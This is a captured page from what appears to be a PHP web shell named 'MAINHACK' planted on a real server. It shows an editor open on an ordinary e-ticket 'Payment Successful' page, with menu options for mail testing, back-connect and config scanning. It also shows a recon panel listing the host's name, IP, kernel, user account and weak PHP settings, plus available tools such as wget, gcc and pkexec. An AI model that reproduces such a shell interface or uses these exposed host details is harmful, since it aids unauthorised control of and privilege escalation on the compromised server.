[
MAINHACK
]
Mail Test
BC
Config Scan
HOME
Create...
New File
New Folder
Viewing / Editing File: success.php
<?php include("functions.php"); session_unset(); //Destroy Session session_destroy(); ?> <!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>Payment Success</title> <!-- Bootstrap CSS --> <link href="https://cdn.jsdelivr.net/npm/bootstrap@5.3.0/dist/css/bootstrap.min.css" rel="stylesheet"> <!-- Custom CSS --> <style> body { font-family: 'Arial', sans-serif; background-color: #f4f4f9; display: flex; justify-content: center; align-items: center; min-height: 100vh; margin: 0; } .success-container { background: #fff; border-radius: 10px; box-shadow: 0 4px 8px rgba(0, 0, 0, 0.1); padding: 30px; max-width: 500px; width: 100%; text-align: center; animation: fadeIn 1s ease-in-out; } .success-icon { font-size: 60px; color: #28a745; margin-bottom: 20px; } .success-title { font-size: 24px; font-weight: bold; color: #333; margin-bottom: 15px; } .success-message { font-size: 16px; color: #666; margin-bottom: 20px; } .order-details { background: #f8f9fa; padding: 15px; border-radius: 5px; margin-bottom: 20px; text-align: left; } .order-details p { margin: 5px 0; font-size: 14px; color: #555; } .btn-home { background-color: #007bff; color: #fff; padding: 10px 20px; border: none; border-radius: 5px; font-size: 16px; text-decoration: none; transition: background-color 0.3s; } .btn-home:hover { background-color: #0056b3; } @keyframes fadeIn { from { opacity: 0; transform: translateY(-20px); } to { opacity: 1; transform: translateY(0); } } @media (max-width: 576px) { .success-container { padding: 20px; margin: 15px; } .success-title { font-size: 20px; } .success-message { font-size: 14px; } .success-icon { font-size: 50px; } } </style> </head> <body> <div class="success-container"> <!-- Success Icon --> <div class="success-icon">✔️</div> <!-- Success Title --> <h2 class="success-title">Payment Successful!</h2> <!-- Success Message --> <p class="success-message"> Thank you for your patronage. Your e-ticket transaction has been completed successfully. You’ll receive a confirmation SMS with the details shortly, and your e-ticket code will be delivered via SMS. Enjoy the event. </p> </div> <!-- Bootstrap JS and Popper.js --> <script src="https://cdn.jsdelivr.net/npm/bootstrap@5.3.0/dist/js/bootstrap.bundle.min.js"></script> <!-- Custom JS for Dynamic Content (Optional) --> <script> // Example: Display a dynamic thank you message document.addEventListener('DOMContentLoaded', function() { const urlParams = new URLSearchParams(window.location.search); const userName = urlParams.get('name') || 'Customer'; const successMessage = document.querySelector('.success-message'); successMessage.innerHTML = `Thank you for your patronage. Your e-ticket transaction has been completed successfully. You’ll receive a confirmation SMS with the details shortly, and your e-ticket code will be delivered via SMS. Enjoy the event`; }); </script> </body> </html>
Save Changes
Cancel / Back
Close ×
Server Info
Hostname: server1.winmanyltd.com
Server IP: 203.161.60.52
PHP Version: 8.3.27
Server Software: Apache
System: Linux server1.winmanyltd.com 4.18.0-553.22.1.el8_10.x86_64 #1 SMP Tue Sep 24 05:16:59 EDT 2024 x86_64
HDD Total: 117.98 GB
HDD Free: 60.09 GB
Domains on IP: N/A (Requires external lookup)
System Features
Safe Mode:
Off
disable_functions:
None
allow_url_fopen:
On
allow_url_include:
Off
magic_quotes_gpc:
Off
register_globals:
Off
open_basedir:
None
cURL:
Enabled
ZipArchive:
Enabled
MySQLi:
Enabled
PDO:
Enabled
wget:
Yes
curl (cmd):
Yes
perl:
Yes
python:
Yes (py3)
gcc:
Yes
pkexec:
Yes
git:
Yes
User Info
Username: eliosofonline
User ID (UID): 1002
Group ID (GID): 1003
Script Owner UID: 1002
Current Dir Owner: 1002